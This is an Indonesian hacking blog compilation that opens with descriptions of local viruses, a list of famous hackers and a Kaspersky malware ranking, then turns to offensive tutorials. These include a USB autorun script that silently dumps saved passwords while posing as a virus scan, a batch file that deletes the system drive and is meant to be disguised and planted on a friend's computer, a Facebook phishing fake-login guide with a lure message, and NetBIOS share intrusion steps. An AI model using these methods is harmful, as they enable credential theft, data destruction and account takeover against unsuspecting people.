Virus lokal yang satu ini, lagi-lagi dibuat menggunakan Visual Basic, dan sepertinya ada kemiripan dengan virus Aksika, bisa jadi ia merupakan versi modifikasi dari virus Aksika. Virus ini menyamar menggunakan icon mirip folder, dengan ukuran file sekitar 152KB tanpa di-pack. Pada komputer terinfeksi, akan ditemukan beberapa file yang mirip sekali dengan folder padahal itu adalah virus. Diketahui, pada setiap root drive, ia akan membuat sebuah folder dengan nama valerianet yang berisi file virus. Untuk mengetahui apakah komputer sudah terinfeksi virus ini apa belum, cukup mudah. Komputer terinfeksi ditandai dengan terdapatnya file dengan nama valeria.txt di C:\.

4. Fdshield

Virus yang dibuat menggunakan bahasa Delphi ini menggunakan icon yang menyerupai Internet Explorer. Memiliki ukuran file sebesar 553.472 bytes, tanpa di-pack. Satu hal yang mencolok dari virus ini adalah dari nama yang digunakan saat menyebar, yang bertuliskan “17++ Sexs & Rahasia Wanita artis Indonesia (foto2_kamera tersembunyi_liputan).exe”. Bagi user yang tidak hati – hati, akan menyangka file tersebut merupakan file HTML. Jika Anda lihat pada direktori C:\Windows\System32, akan ditemukan sebuah file induk dengan nama “rundl32.exe”. Jangan tertipu lagi! Itu bukanlah file bagian dari Windows, tapi itu memang adalah file virus. Perhatikan huruf “L” yang cuma satu. Dan sekarang lihat pada Schedule Task, ada Job baru dengan nama “Windows FD Shield” yang akan mengeksekusi file virus diwaktu yang telah ia tentukan.

5. WSar.D

Seperti varian sebelumnya, ia masih dibuat menggunakan VB. Varian ini memiliki ukuran sekitar 108KB, murni tanpa di-pack. Karena icon yang digunakan adalah icon mirip folder, saat beraksi, ia akan mencari folder pada setiap drive yang ada di komputer korban, dan membuat duplikat dirinya dengan nama sama seperti folder asli.

6. Purwo Variant

Satu lagi varian baru, Purwo.C, masih dibuat menggunakan Visual Basic, dengan badan berukuran sekitar 56KB, murni tanpa di-pack. Virus ini menggunakan icon mirip dokumen Word milik MsOffice untuk menipu calon korbannya. Saat menginfeksi ia menciptakan sebuah folder dengan nama “Purwokerto Under Cover” yang diberi attribut hidden, dan berisi sebuah file bernama “KoruptorPurwokerto.exe” pada setiap drive yang ia temukan. Di dalam folder C:\Windows\System32\system juga ada file windowss.exe, dan di C:\Windows\javaa\service.exe. Di waktu tertentu ia akan menampilkan layar hitam yang berisi teks pesan dari pembuatnya. Dan hati-hati, virus ini juga akan menghapus beberapa file milik Anda yang ia temui.

7. Yuyun.vbs

Virus yang diciptakan menggunakan Visual Basic Script ini berukuran sekitar 9KB. Pada komputer terinfeksi ia akan membuat banyak sekali file duplikat di setiap folder yang ia temukan dengan nama file autorun.inf, Thumb.db, dalam kondisi ber-attribut hidden, dan sebuah shortcut dengan nama Microsoft. Jika shortcut tersebut diakses, dia memang akan menuju ke suatu folder, tapi dibalik itu virus tersebut juga akan aktif. File Thumb.db disini juga bukan merupakan file milik Windows, tapi melainkan file script virus. Pada komputer terinfeksi juga akan ditemukan sebuah file pesan virus pada direktori Temp user. Di direktori ini juga akan ditemukan file lain yakni script virus yang sudah dalam kondisi ter-decrypt. Karena perlu Anda ketahui bahwa virus ini memang hadir dalam kondisi ter-enkripsi.

8. Raider.vbs Variant

Virus jenis VBScript ini jika file virusnya dibuka dengan Notepad, tidak banyak string yang bisa dibaca karena dalam kondisi ter-enkripsi. Ini sudah menjadi kebiasaan dalam setiap variannya. Biasanya, pada Registry, ia akan memberikan pengenal dengan membuat key baru di HKLM\Software dengan nama sama seperti nama pada computer name, dengan isinya berupa string value seperti nama virus tersebut, Raider, serta tanggal komputer tersebut kali pertama terinfeksi.

9. Malingsi

Virus bertubuh gemuk dengan ukuran 705.312 bytes ini dibuat menggunakan Visual Basic yang di-pack menggunakan PECompact. Sepertinya virus ini ditujukan untuk menyerang virus lain, ini terlihat dari pesan yang ada di tubuhnya. Virus ini berkembang biak dan menyebar menggunakan perantara mIRC, yang bertindak sebagai Bot.

10. Rieysha Variant

Ditemukan lagi varian dari Rieysha, kali ini dengan nama Rieysha-Sma. Seperti varian sebelumnya, ia masih dibuat menggunakan Visual Basic. Ukuran kali ini sekitar 104KB, dengan icon yang menyerupai file Real Media Player. Saat menginfeksi, ia akan membuat duplikat file exe, mp3, doc, dan 3gp yang digantikan dengan dirinya. Selain itu, setidaknya ada 2 buah file virus pada root drive, dengan nama “sma3gp.exe” dan “CeritaSeru.vbs”.

SUMBER :http://harifzah.wordpress.com/2009/03/11/top-10-jenis-virus-berbahaya-maret-2009

10 Hacker Berbahaya di Dunia

Hacker attack

Hacker adalah seseorang atau beberapa orang yang ahli dan mengetahui seluk beluk komputer baik software, hardware, keamanan atau jaringannya.
Hacker sering dikonotasikan sebagai penjahat di dunia komputer. Namun sesungguhnya tidak semua hacker
melakukan kejahatan, terdapat pula hacker yang memang berfungsi sebagai peneliti dan pengembang
dengan cara menelusuri lubang-lubang keamanan sebuah software atau jaringan komputer. Hacker Paling Berbahaya di Dunia, Hacker-Hacker terkenal di dunia

Hacker yang kerjaannya suka iseng ngacak-acak bahkan merusak jaringan sistem komputer milik pemerintah, perusahaan, maupun perseorangan secara ilegal ternyata setelah insyaf banyak yang berhasil dalam pekerjaannya. Gak percaya, ini dia orang-orangnya. Menurut sebuah media kenamaan Telegraph (29/11/2009), Ada beberapa orang hacker kawakan yang dinilai paling jago:

1. Kevin Mitnick, pernah dicap sebagai buronan kejahatan komputer paling dicari se Amrik. Mr. Kevin ini, ketahuan membobol jaringan komputer kepunyaan Raksasa telekomunikasi seperti Nokia, Fujitsu and Motorola. Kevin Mitnick ditangkap oleh polisi federal Amrik FBI pada Januari 1995 di apartemennya di kota Raleigh, North Carolina.

2. Kevin Poulsen adalah jawaranya hacker. Saking jagonya orang Pasadena Amerika Serikat ini berhasil membobol jaringan telepon tetap milik stasiun radio Los Angeles KIIS-FM. Hasilnya dia sering memenangkan kuis-kuis radio, dari hasil kuis tersebut mendapat sebuah mobil Porsche. Sekarang Kevin sudah jera dan menjadi senior editor di Wired News.

3. Adrian Lamo, atau the homeless hacker. Dapat julukan kayak gitu karena Adrian sering melakukan aksinya di kedai-kedai kopi, perpustakaan atau internet cafe. Dia berhasil membobol jaringan Raksasa media New York Times dan Microsoft, MCI WorldCom, Ameritech, Cingular. Nggak sampai disitu doank, berhasil masuk ke sistem milik AOL Time Warner, Bank of America, Citigroup, McDonald's and Sun Microsystems. Akhirnya, si hacker ini sekarang punya pekerjaan sebagai wartawan.


4. Stephen Wozniak, nggak nyangka banget kalau pendiri Apple Computer ini dulunya adalah seorang hacker. Biasa dipanggil 'Woz' ini sewaktu mahasiswa ketahuan membobol jaringan telepon, supaya bisa nelepon jarak jauh gratis dan sampe puas. Alat yang dibuat semasa jadi hacker itu dikenal dengan nama blue boxes

5. Loyd Blankenship, anggota gank hacker Legion Of Doom yang kesohor pada zaman 80'an ini punya julukan The Mentor. Setelah tertangkap, akhirnya nulis sebuah buku tentang pengakuannya berjudul The Conscience of a Hacker (Hacker Manifesto).

6. Michael Calce, mulai jadi pembobol jaringan sejak umurnya 15 tahun. Sasarannya adalah membobol situs-situs komersial dunia. Dengan nama samaran MafiaBoy, di tahun 2000 berhasil ketahuan membobol eBay, Amazon and Yahoo

7. Robert Tappan Morris, lebih dikenal sebagai ahli bikin virus yang disebar ke enam ribu komputer. Sekarang Morris jadi dosen di perguruan TI bonafid di Amrik Massachusetts Institute of Technology (MIT).

8. The Masters Of Deception, sebuah gank hacker yang punya markas di New York Amrik. Kerjaannya mengacak jaringan telepon punya perusahaan telekomunikasi seperti AT&T. Hampir semua angotanya tertangkap tahun 1992 dan masuk ke penjara.

9. David L. Smith, hasil karyanya adalah berhasil bikin virus bernama Mellisa worm, tahun 1999. Nama lain virus bikinannya adalah Mailissa,Simpsons,Kwyjibo,atau Kwejeebo. Virus ini bikin rugi sebesar $US80 juta.

10. Sven Jaschan, berhasil bikin program Netsky dan Sasser worm pada 2004 yang semuanya perusak. Setelah insyaf dia sekarang bekerja di sebuah perusahaan keamanan jaringan

Rabu, 17 Februari 2010

100 Virus Paling Berbahaya di Indonesia

Semua pengguna komputer pasti sudah tidak asing lagi mendengar kata ‘virus’, pembuat virus bukan hanya di luar negeri saja, melainkan ada virus-virus lokal buatan Indonesia. Kaspersky sebagai perusahaan antivirus dan keamanan komputer memberikan 100 data virus lokal yang paling berbahaya di Indonesia.

Di puncak teratas di duduki oleh Worm.Win32.AutoTDSS.hn yang mencapai 16,8 % dari jumlah infeksi. Meski demikian, ada satu nama yang cukup dominan dalam daftar 100 program yang menyebalkan itu. Dia adalah Kido, sebuah program jahat tipe worm yang menyebar sejak akhir 2008. Tercatat ada 26 varian Kido dalam daftar tersebut.

Worm yang menyebar melalui jaringan lokal dan media penyimpanan semacam USB Flashdisk ini memiliki banyak varian. Program jahat ini bisa mematikan system restore, memblokir akses ke situs keamanan dan mengunduh program jahat lain ke dalam komputer yang terinfeksi.

Berikut adalah daftar 100 program jahat paling berbahaya di Indonesia yang terlacak Kaspersky pada periode 1 Januari 2009 – 19 Januari 2009. Angka dalam persen menunjukkan tingkat ditemukannya program itu:
1. Worm.Win32.AutoTDSS.hn 16.8469%
2. HEUR:Trojan.Win32.Generic 11.9442%
3. Heur.Win32.Trojan.Generic 11.3675%
4. Trojan-Proxy.Win32.Agent.mf 4.9748%
5. Net-Worm.Win32.Kido.s 4.422%
6. Net-Worm.Win32.Kido.ih 3.1963%
7. Trojan-Downloader.Win32.Small.aacq 2.5955%
8. Trojan-Dropper.Win32.Small.axv 2.5715%
9. Heur.Win32.Invader 2.5715%
10. Worm.Win32.AutoTDSS.bcw 2.4033%
11. Trojan-GameThief.Win32.Magania.gen 2.3071%
12. Trojan-Dropper.Win32.Agent.bvn 2.2591%
13. Net-Worm.Win32.Kido.t 2.0908%
14. Trojan-Downloader.Win32.Agent.wxq 1.2497%
15. Trojan.Win32.Agent2.w.a 1.1776%
16. Worm.Win32.Downloader.yw 1.0815%
17. Trojan.Win32.Qhost.kmq 1.0094%
18. Trojan-Dropper.Win32.Agent.zje 0.8892%
19. Trojan-Dropper.Win32.Small.cdw 0.6729%
20. Trojan.Win32.Agent.bhug 0.6489%
21. Trojan.Win32.Agent.bdzl 0.6008%
22. HEUR:Trojan-Downloader.Win32.Generic 0.6008%
23. HEUR:Trojan.Win32.Invader 0.5768%
24. Heur.Win32.Downloader 0.5047%
25. Trojan.Win32.Agent.bfnz 0.5047%
26. Trojan-Downloader.Win32.Agent.arqp 0.4807%
27. Trojan.Win32.Obfuscated.gen 0.4326%
28. Trojan-Downloader.Win32.Small.izw 0.4086%
29. Net-Worm.Win32.Kido.bt 0.4086%
30. Trojan.Win32.Monder.gen 0.3845%
31. Net-Worm.Win32.Kido.eo 0.3845%
32. Trojan-Downloader.Win32.CodecPack.dbn 0.3845%
33. Multi.Win32.Packed 0.3605%
34. bukan virus:FraudTool.Win32.Antivirus2009.eg 0.3365%
35. Trojan-Downloader.Win32.Agent.bbvy 0.3365%
36. Net-Worm.Win32.Kido.ed 0.3124%
37. Trojan-Downloader.Win32.Small.ailx 0.3124%
38. Packed.Win32.PolyCrypt.d 0.2884%
39. Trojan-Spy.Win32.FtpSend.b 0.2884%
40. Net-Worm.Win32.Koobface.dn 0.2884%
41. Trojan-Downloader.Win32.Agent.bcmd 0.2403%
42. Net-Worm.Win32.Kido.da 0.2403%
43. bukan virus:AdWare.Win32.180Solutions.bj 0.2403%
44. Net-Worm.Win32.Kido.bg 0.2163%
45. Worm.Win32.Downloader.yv 0.2163%
46. Trojan-Spy.Win32.VB.bee 0.2163%
47. Net-Worm.Win32.Kido.c 0.2163%
48. Net-Worm.Win32.Kido.cu 0.2163%
49. Net-Worm.Win32.Kido.bx 0.1923%
50. Net-Worm.Win32.Kido.bw 0.1923%
51. Virus.Win32.VB.ki 0.1923%
52. Suspicious.Win32.Packer 0.1923%
53. Trojan.Win32.FraudPack.aie 0.1923%
54. Trojan-Downloader.Win32.FraudLoad.cxs 0.1923%
55. Trojan-Mailfinder.Win32.Delf.cr 0.1923%
56. Trojan.Win32.Agent.bcan 0.1682%
57. Net-Worm.Win32.Kido.gx 0.1682%
58. Net-Worm.Win32.Kido.dw 0.1682%
59. bukan virus:Porn-Dialer.Win32.InstantAccess.e0.1682%
60. bukan virus:AdWare.Win32.Thingies 0.1682%
61. Net-Worm.Win32.Kido.fa 0.1682%
62. Trojan-Downloader.Win32.FraudLoad.vgjq 0.1682%
63. Trojan-Spy.Win32.VB.bev 0.1442%
64. Trojan.Win32.Agentb.ah 0.1442%
65. Backdoor.Win32.VB.hfq 0.1442%
66. Trojan-Downloader.Win32.FraudLoad.cxo 0.1442%
67. bukan virus:AdWare.Win32.OneStep.z 0.1442%
68. Virus.Win32.Alman.b 0.1442%
69. Virus.Win32.Sality.aa 0.1442%
70. Net-Worm.Win32.Kido.cq 0.1202%
71. Backdoor.Win32.VB.hdt 0.1202%
72. bukan virus:AdWare.Win32.Relevant.n 0.1202%
73. Trojan-Downloader.Win32.Tiny.byt 0.1202%
74. Net-Worm.Win32.Kido.dt 0.1202%
75. Net-Worm.Win32.Kido.bi 0.1202%
76. Trojan-PSW.Win32.IMMultiPass.od 0.1202%
77. bukan virus:AdWare.Win32.Shopper.v 0.1202%
78. Trojan-Dropper.Win32.Delf.clr 0.1202%
79. Net-Worm.Win32.Koobface.dw 0.1202%
80. Trojan-Downloader.Win32.CodecPack.deo 0.0961%
81. Trojan-Mailfinder.Win32.Delf.cq 0.0961%
82. Trojan-Spy.Win32.VB.beq 0.0961%
83. bukan virus:AdWare.Win32.Relevant.a 0.0961%
84. Net-Worm.Win32.Kido.ci 0.0961%
85. Backdoor.Win32.VB.hfr 0.0961%
86. Net-Worm.Win32.Kido.fc 0.0961%
87. Trojan-Downloader.Win32.BHO.ape 0.0961%
88. Net-Worm.Win32.Kido.hs 0.0961%
89. Net-Worm.Win32.Kido.ce 0.0961%
90. Net-Worm.Win32.Kido.bm 0.0961%
91. Hoax.Win32.Renos.vber 0.0961%
92. Trojan-Downloader.Win32.Agent.bakk 0.0961%
93. Trojan.Win32.Inject.mvu 0.0961%
94. Trojan.Win32.Agent.aoxh 0.0961%
95. Net-Worm.Win32.Kido.i 0.0961%
96. Trojan-Dropper.Win32.Small.ayg 0.0961%
97. Trojan-Downloader.Win32.Agent.ahyl 0.0961%
98. Net-Worm.Win32.Kido.fl 0.0961%
99. Trojan.Win32.Inject.nlj 0.0961%
100. Net-Worm.Win32.Kido.fm 0.0961%

Kaspersky mengingatkan bahwa untuk terhindar dari program-program jahat disarankan untuk menginstall antivirus dan melakukan peng-update-an antivirus secara berkala.

Minggu, 14 Februari 2010

Indonesia Hacker

Indonesia Hacker atau Hacker Indonesia, di bolak balik ajah sih sebenernya. Haha.. Kini bendera Indonesia mulai berkibar di dunia internet karena komunitas hacker indonesia yang sangat kompak, atraktif, maju, innovatif dan terbuka. Oleh karena itu mari kita teruskan perjuangan para under / up ground Indonesia Hacker. Demi kemajuan dunia teknologi informatika saat ini mari seluruh Hacker Indonesia umumnya dah BinusHacker khususnya mendukung perkembangan teknologi dan opensource.

Berikut ini ulasan yang sedikit gw dapet tentang sejarah hack this stuff dari bang kiwil dengan sedikit banyak gw revisi dolo demi perkembangan Indonesia Hacker. Hehe..

Sejarah tentang Hack, Hacker, dan Hacking

Sebelum terbentuknya komunikasi yang tercipta di Internet, pada tahun 1960-an beberapa mahasiswa ilmu komputer di Massachusetts Institute of Technology (MIT) yang gemar untuk melakukan engineering dan re-engineering terhadap perangkat keras dan perangkat lunak sering melakukan diskusi-diskusi terbuka yang disana membahas masalah :

■Ide-ide mengenai pengembangan perangkat keras dan perangkat lunak
■Ide-ide mengenai transformasi terhadap teknologi dan informasi
Pengistilahan dan perkataan “Hack” sebenarnya adalah merupakan slang yang pada saat itu belum memiliki arti yang spesifik dan sebenarnya. Kebiasaan-kebiasaan mengucapkan “I Hack This Stuff” seakan-akan memberikan arti bahwa istilah Hack merupakan kegiatan yang sedang dan memperoleh hasil setelah melakukan pengembangan terhadap segala sesuatu yang dilakukan. Pengembangan-pengembangan yang secara khusus diberikan kepada minicomputer dan microcomputer tersebutlah istilah “Computer Hacker” terbentuk.

Dengan kata lain, Computer Hacker adalah seseorang yang mengaplikasikan kemampuan dalam cakupannya mengenai komputer software, komputer hardware, komputer arsitektur, komputer desain, serta administrasi yang terkandung didalamnya. Seorang Hacker dituntut memiliki kemampuan dalam hal pemrograman untuk tingkatan software, dan keahlian dibidang hardware. Tuntutan yang sedemikian luasnya untuk keamanan disisi sistem aplikasi dan jaringan, memberikan motivasi bagi seorang Hacker untuk mengembangkan keahlian tersebut sehingga hasil dari penelitian yang dilakukan akan memberikan dampak yang positif bagi kelangsungan IT itu sendiri.

Dengan melihat sekelumit penjelasan diatas, kita dapat memberikan kesimpulan bahwa Hacking bukanlah sebatas pada kegiatan illegal yang identik dengan pengrusakan sebuah sistem dan aplikasi, atau sebatas kegiatan-kegiatan tentang pencurian sebuah data-data penting, melainkan kepada tindakan untuk melakukan perubahan yang mendasar atau perbaikan-perbaikan terhadap sistem dan aplikasi, baik yang berupa software ataupun hardware.

KELOMPOK HACKER BERDASARKAN MOTIF

■Black Hat Para hacker yang menjelma menjadi cracker / attacker yang menggunakan kemampuannya untuk tujuan kriminal dan cenderung membahayakan kepentingan pihak lain. Pada umumnya orang-orang yang tergabung dalam kelompok ini adalah yang bergerak secara individu atau sesuai idealisme tertentu dan tidak terikat atas kepentingan pihak tertentu.
■Grey Hat Para hacker yang memberikan informasi yang diperoleh ke para attacker maupun para vendor, untuk memperoleh imbalan tertentu. Kelompok ini dikenal juga sebagai cracker, yakni orang-orang yang tidak memiliki keberpihakan pada pihak manapun dan menjual berbagai informasi yang diperlukan sesuai kebutuhan yang ada.
■White Hat (hacker sejati) Orang-orang yang melakukan aktivitas hacking dalam rangka memperoleh informasi tentang celah-celah keamanan, maupun kelemahan-kelemahan yang dimiliki untuk diberikan kembali kepada pihak yang bersangkutan untuk disempurnakan kembali.
■Blue Hat yang punya kemampuan seperti white hat, tapi berkecimpung di dunia pendidikan.

TUJUH KELOMPOK HACKER BERDASARKAN PROFILE KEMAMPUAN

Pembagian para hacker berdasarkan profile kemampuan profesionalnya terbagi menjadi tujuh kelompok. Hal ini sebagaimana dijelaskan oleh Marc Rogers MA, seorang guru besar psikologi dari University of Manitoba Hawai, yakni:

■Tool Kids/NewBies Orang-orang yang baru belajar aktivitas hacking, namun kemampuan kemampuan tentang komputer serta teknik pemrograman relatif terbatas dan hanya baru bisa membuat program-program dasar. Aktivitas hacking yang dilakukan, umumnya menggunakan bantuan aplikasi yang terdapat di internet hingga tidak murni mengandalkan kemampuan individunya.
■Cyber Punk Orang-orang yang memiliki pengetahuan dan teknik komputer yang lebih tinggi dibandingkan NewBies. Mereka sudah mampu memahami karakteristik dari sistem jaringan ataupun sistem yang sedang mereka serang. Pengetahuan mereka tentang bahasa pemrograman cukup andal, karena mampu mendefinisikan hingga karakteristik umumnya. Dengan kemampuannya ini, ia sudah mampu menciptakan alat bantu infiltrasi sendiri, hingga tidak lagi menggunakan program-program bantu yang tersedia di internet. Aktivitas-aktivitas yang dilakukan memiliki kecenderungan untuk kriminal, seperti defacing web, carding, ataupun spamming.
■Internals Orang-orang yang masih bergabung ataupun pernah (mantan) dengan perusahaan TI, dengan kemampuan komputer dan programming yang anda. Dan melakukan berbagai aktivitas hacking dengan mengandalkan berbagai kombinasi sumber daya internal maupun eksternal yang ada untuk berbagai tujuan. Contoh, pelanggaran paling sering dilakukan adalah breaking over priviledge activity, yakni segala aktivitas yang melanggar batasan-batasan hak yang dimiliki.
■Coders Golongan ini dikenal juga sebagai resources, yakni orang-orang yang menjual berbagai informasi yang ada di internet ke pihak-pihak yang membutuhkan. Kemampuan programming dan teknisnya sangat andal dan kelompok ini malakukan berbagai aktivitas infiltrasi dalam rangka untuk memperoleh berbagai data ataupun informasi yang dapat dijual. Coders juga membantu membuat berbagai aplikasi bantu hacking yang dibutuhkan oleh para hacker ataupun attacker/cracker yang membutuhkan.
■Old Guard Hackers (Idealism Gate Keepers) Para hacker sejati yang murni melakukan aktivitas-kativitas hacking dalam rangka untuk tujuan ilmiah dan kebaikan semua pihak. Jumlah golongan ini relatif sangat sedikit, karena idealisme yang dijunjung memaksa mereka untuk menggunakan kode etik yang dijunjung tinggi oleh para hacker, yakni kemampuan di atas segalanya.
■Professional Criminals Para attacker/cracker yang bergerak atas nama kelompok ataupun individu dan melakukan berbagai aktivitas cyber crime sebagai sumber kehidupan utamanya. Kemampuan yang dimiliki oleh kelompok ini sangat sempurna karena mengombinasikan berbagai piranti keras dan pengetahuan programming yang bisa diandalkan dibantu data/informasi yang diperoleh dari Coders. Aktivitas kejahatan yang dilakukan tidak lagi dalam kelas cyber punk yang lebih banyak pada target individu, namun justru pada kalangan korporat dengan jalan merampok dana yang tersedia dengan melakukan transfer secara tersembunyi.
■Cyber Terrorist Sekelompok orang atau individu yang bertindak atas dasar sentimen pada suatu kelompok atau pihak tertentu, dan melakukan berbagai aktivitas yang bertujuan untuk menunjukkan eksistensi mereka pada lingkungan dunia. Tingkatan kemampuan yang dimiliki kelompok ini adalah yang tertinggi karena menggabungkan berbagai sumber daya yang ada, level kemampuan, bahkan menggunakan sarana prasarana bantuan dari pihak sponsor yang membantu seperti satelit komunikasi.
Apapun alasannya ‘hacking’ adalah tindakan yang tidak melangar hukum, namun disebut “cracking” apabila digunakan untuk merusak, menghilangkan data / sesuatu yang bukan milik kita. Akan tetapi yang kita ketahui bersama – sama bahwa tidak adanya jaminan yang memastikan data atau informasi yang kita punya adalah 100 % aman dan kondisi inilah yang digunakan orang untuk memulai “pekerjaan” merusak dari awalnya iseng hingga professional. Hal terpenting yang bisa kita lakukan adalah menutup segala kemungkinan celah keamanan yang terbuka dan selalu mengupdate data / informasi [ siaga ].

[ How About You ? What Type Of Hacker You Want ? Ready To Hack? ]

Oke – Apakah lu dah siap untuk gabung jadi Hacker Indonesia ?? Ato lu mundur??
Hehehehhe.. Mari kita kibarkan Bendera Merah Putih Indonesia di Dunia Cyber!!

We are Indonesian Hacker ( Kami adalah Hacker Indonesia )
Yang Menjunjung Tinggi Pancasila dan Bhinneka Tunggal Ika
Viva Hacker Indonesia – Maju Terus Indonesia Hacker

To All BinusHacker: Maju Terus Pantang Mundur – Enjoy & Eat It!

Sabtu, 13 Februari 2010

Craking Password Menggunakan USB Drive

ok. persiapan yang perlu di lakukan
1.sediakan rokok dan kopi secukupnya ha..ha..ha..ha..ha...!!
2.jangan lupa korek dan gula buat persiapan yang no 1 di atas
3.Download 5 tools dibawah ini :

password internet explorer
password email
password messenger
password firefox
password browser MSN, dan opera

iepv -> mencuri password yang menggunakan internet explorer
mspass -> mencuri password messenger
mailpv -> curi password email
pspv -> mirip iepv, cman pspv bs mengambil password dari browser MSN, dan opera
passwordfox -> mirip iepv dan pspv, cman ini bisa jalan di firefox

step by step :
1. buka notepad dan ketik
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
Simpan nama file sebagai autorun.inf dan letakkan di USB

2. Buka notepad dan ketik
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
Simpan dengan nama launch.bat dan letakkan di USB

Cara kerja :
1. Masukkan USB ke laptop or PC.
2. USB akan muncul secara otomatis, muncul pop-up windows dan pilih (Perform a Virus Scan).
3. Semua password yang ke record akan disimpan di .txt file
4. Lepaskan USB dan buka file .txt, semua akan terlihat disitu..

Membuat File Rahasia Dalam bentuk [*.JPG]

Membuat File Rahasia Dalam bentuk [*.JPG]


Saya akan membagikan sedikit tips bagi anda untuk menyembunyikan file rahasia anda ke dalam sebuah file gambar.

Sebelumnya pastikan bahwa komputer anda telah terinstall WinRar.

Langkah 1 :
Kumpulkan file-file anda yang ingin di sembunyikan dan compress jadi satu dengan menggunakan Winrar.
Misalkan beri nama filerahasia.rar

Langkah 2 :
Siapkan sebuah file gambar (.jpg).
Misalkan beri nama gambar.jpg

Langkah 3 :
Letakkan kedua file tersebut ( File gambar.jpg dan filerahasia.rar )dalam sebuah directory yang sama.
misalkan Drive c:

Langkah 4 :
Buka command prompt dan ketikkan :
c:\>copy /b gambar.jpg+filerahasia.rar hasil.jpg

Langkah 5 :
Setelah itu akan tercipta sebuah file baru dengan nama hasil.jpg.

Coba anda buka file hasil.jpg.
Sekilas tidak akan ada bedanya dengan file gambar.jpg milik anda kecuali ukuran filenya yang bertambah besar.
Anda tetap bisa membuka file tersebut dengan Picture Editor atau Image Viewer anda.
Tidak ada tanda-tanda bahwa sebenarnya ada sebuah file rahasia didalamnya.

Langkah 6 :
Bagaimana cara membuka file rahasia Anda?
Klik kanan pada file hasil.jpg lalu pilihlah [Open With] –> [Choose Program..]. Pilihlah WinRar lalu klik [OK].

Anda akan bisa melihat file rahasia anda dan bisa mengextract seperti biasanya.

Script Pengrusak Komponen Windows

Script Pengrusak Komponen Windows


oke.... kita mulai aja pembahasannya...
pertama-tama gue mau nanya dulu ya??
pertanyaan gue simple aja:

1. pernah kamu di kerjain sama temanmu sendiri?
misalnya mengambil data dari komputermu secara diam2?
atau memasukan virus trojan hours ke dalam komputermu??
hiii... jengkelin ya?? trus komputer kita bisa di intip dari jauh klo terhubung dengan internet

2. kamu masih sakit hati ga sama dia?? klo masih aku punya teknik untuk memuaskan amarahmu ke dia.
caranya :

1.buka aplikasi notepad.exe
2. copy paste code di bawah ini

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

3. save as dengan nama apa aja...!! terserah kamu yang penting ber'extensi [*.bat]

contohnya : setelah code di atas di copy paste trus kamu save as dengan pilihan file
(all) berikan nama file tersebut misalnya : {cewe sexy}=cewe sexy.bat trus save...

file yang sudah jadi itu iconya mirip2 command pront pada windows. nah file yang bakalan buat dia menderita?? ... hahahaha soalnya harus install ulang windowsnya sudah jadi. tinggal kamu masukin filenya ke komputer target]. biarin dia terkecoh membuka file tadi...dan dalam waktu kurang dari 2 menit komputernya akan restart dan mengkonfirmasikan bahwa terjadi corrupt pada system komponen windows dan harus di install ulang...

tapi terserah kamu...sih mending jangan deh kasian tuh target klo dia ga bisa nginstall windows gimana donk?? hahaha
ini sebenarnya hanya buat pembelajaran betapa rentanya system operasi windows

hanya dengan symbol yang jumlahnya ga nyampe 100 bisa merusak organ penting di dalamnya.... Ga percaya?? coba aja....!!!

Tutorial Hacking Password Facebook 2009

Kali ini gue akan menjelaskan mengenai jenis serangan fake login untuk mencuri account FB seseorang.... ok kita mulai....!!! pertama-tama download script fakeloginnya di sini:


FB-hack.rar
Setelah di download pasang di hosting anda.
Jika mau lebih aman bisa pake subdomain :
facebook.com.profile.php.id.(namadomain).com
Lebih bagus jika domain anda adalah angka misal 94832.com jd seakan-akan itu nomor profile. agar makin tersamarkan bisa menggunakan domain .cc atau .cn.

Setelah itu anda bisa mengirimkan pesan ke pengguna facebook lewat e-mail, facebook atau lainnya dengan isi :
Quote::

Facebook has limits in place to prevent behavior that other users may find annoying or abusive. These limits restrict the rate at which you can use certain features on the site. Unfortunately, we cannot provide you with the specific rates that have been deemed abusive.

Your account has been disabled because you exceeded Facebook's limits on multiple occasions when sending friend requests, despite having been warned to slow down.

After further review of your account, we have determined that you violated our Terms of Use by misusing our site features to harass other users. We will not be able to reactivate your account for any reason. This decision is final.

Please relogin for reactivate your account <= Link ke Fake login

Thanks for your understanding,

Hacking netbios

Hacking menggunakan metode Netbios atau lebih dikenal dengan Netbios Hacking merupakan teknik hacking klasik yang bisa kita pelajari dan tidak salah untuk dipraktekkan. Hacking Netbios cocok diterapkan pada jaringan LAN, semisal warnet atau jaringan kantor.


Hal utama yang dibutuhkan dalam Netbios Hacking adalah IP Address. Ada berbagai tools dan sofware yang dapat digunakan untuk menscan IP Address yang sedang aktif pada jaringan lokal, misalnya Look at Lan, IP Scanner, dll. Pelajari penggunaanya disini.

Langkah-langkah Netbios Hacking :

1 Buka command Prompt, atau pada run ketik cmd kemudian enter.

2 Pada command prompt ketik netview \\ip_address, misalnya C:\>net view \\192.168.1.1

Jika tidak ada pesan error yang ditampilkan, coba dengan IP Address yang berbeda. Jika sukses tidak ada pesan error, lanjutkan dengan perintah yang lain dibawah ini.

C:\>net use C:\\192.168.1.100
C:\>net use D:\\192.168.1.100\SharedDocs
C:\>net use F:\\192.168.1.100\Myprint

Pada contoh-contoh di atas menunjukan beberapa perintah yang biasa digunakan. C:,D:, dan F: adalah drive yang biasa terdapat di komputer. Perintah pertama bertujuan untuk mengakses drive C. Perintah kedua (SharedDocs) digunakan untuk mengakses Dokumen yang di sharing sedangkan perintah ketiga (Myprint) dipakai untuk mengakses printer komputer yang akan diremote.

Jika tampil pesan "The commad completed successfully", berarti perintah yang dilakukan berhasil meremote komputer korban. Langkah selanjutnya tinggal mengobrak-abrik komputer korban, mencopy, menghapus data, memasukan virus, spyware, trojan atau keylogger.

Menarik bukan?... Hacking netbios dapat dijadikan awal kita memulai aktifitas hacking di jaringan. wew....
Catatan: Hacking netbios yang dapat dijalankan pada komputer yang tidak terlindungi oleh Firewall. Jadi jika Firewall komputer diaktifkan maka akan tampil pesan error. Stop dan coba dengan IP Address yang berbeda.

Selamat mencoba

Cara Membobol / Membuka password file rar dan zip

Pernakah kamu mendownload file besar, seperti contohnya game berexstensi rar dan ternyata disitu meminta untuk memasukan password ? pasti jengkel sekali !!
tenang saja password tersebut bisa kita buka.
dengan aplikasi RarCrack kita bisa mebobolnya / membukanya.

